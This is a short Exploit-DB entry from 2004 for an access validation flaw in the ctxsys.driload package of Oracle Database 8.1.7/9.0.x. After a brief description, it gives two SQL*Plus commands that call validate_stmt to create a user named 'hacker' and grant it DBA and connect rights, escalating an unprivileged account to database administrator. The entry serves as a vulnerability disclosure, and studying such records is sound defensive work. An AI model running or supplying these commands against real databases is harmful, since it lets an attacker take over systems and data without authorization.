Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation

EDB-ID:

24567




Platform:

Multiple

Date:

2004-09-03


source: https://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');